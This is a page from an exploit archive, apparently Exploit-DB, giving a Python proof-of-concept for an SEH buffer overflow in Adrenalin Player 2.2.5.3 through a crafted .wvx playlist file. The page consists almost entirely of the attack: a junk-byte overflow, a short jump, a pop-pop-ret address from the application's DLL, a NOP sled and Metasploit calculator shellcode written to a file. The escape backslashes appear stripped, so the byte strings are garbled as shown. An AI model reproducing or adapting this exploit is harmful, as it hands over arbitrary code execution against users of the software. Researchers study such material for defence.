[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Adrenalin Player 2.2.5.3 (.wvx) - SEH Buffer Overflow
# Published : 2013-07-01
# Author :
# Previous Title : BlazeDVD Pro player 6.1 - Stack Based Buffer Overflow (Direct Ret)
# Next Title : Corel PDF Fusion Stack Buffer Overflow


#Exploit Title:Adrenalin Player 2.2.5.3 (.wvx) SEH-Buffer Overflow 
#Date:7/1/2013
#Exploit Author:MrXors
#Vendor HomePage:http://software.naver.com/software/summary.nhn?softwareId=MFS_100099
#Software Link:http://software.naver.com/software/summary.nhn?softwareId=MFS_100099
#Version App:2.2.5.3
#Tested on: Windows 7 pro x86 Fully-Patched
#CVE:None
junk="x41"*2140    
junk+="xebx06x90x90"#short jmp
junk+="x39xb1x14x10"#pop pop ret ***App Dll***
junk+='x90'*16#NOPS
#Calc shellcode from msf (-b 'x00x0ax0dx0b')
junk+=("xd9xc8xb8xa0x47xcfx09xd9x74x24xf4x5fx2bxc9" +
"xb1x32x31x47x17x83xc7x04x03xe7x54x2dxfcx1b" +
"xb2x38xffxe3x43x5bx89x06x72x49xedx43x27x5d" +
"x65x01xc4x16x2bxb1x5fx5axe4xb6xe8xd1xd2xf9" +
"xe9xd7xdax55x29x79xa7xa7x7ex59x96x68x73x98" +
"xdfx94x7cxc8x88xd3x2fxfdxbdxa1xf3xfcx11xae" +
"x4cx87x14x70x38x3dx16xa0x91x4ax50x58x99x15" +
"x41x59x4ex46xbdx10xfbxbdx35xa3x2dx8cxb6x92" +
"x11x43x89x1bx9cx9dxcdx9bx7fxe8x25xd8x02xeb" +
"xfdxa3xd8x7exe0x03xaaxd9xc0xb2x7fxbfx83xb8" +
"x34xcbxccxdcxcbx18x67xd8x40x9fxa8x69x12x84" +
"x6cx32xc0xa5x35x9exa7xdax26x46x17x7fx2cx64" +
"x4cxf9x6fxe2x93x8bx15x4bx93x93x15xfbxfcxa2" +
"x9ex94x7bx3bx75xd1x7axcax44xcfxebx75x3dxb2" +
"x71x86xebxf0x8fx05x1ex88x6bx15x6bx8dx30x91" +
"x87xffx29x74xa8xacx4ax5dxcbx33xd9x3dx0c")
x=open('Exploit.wvx', 'w')
x.write(junk)
x.close()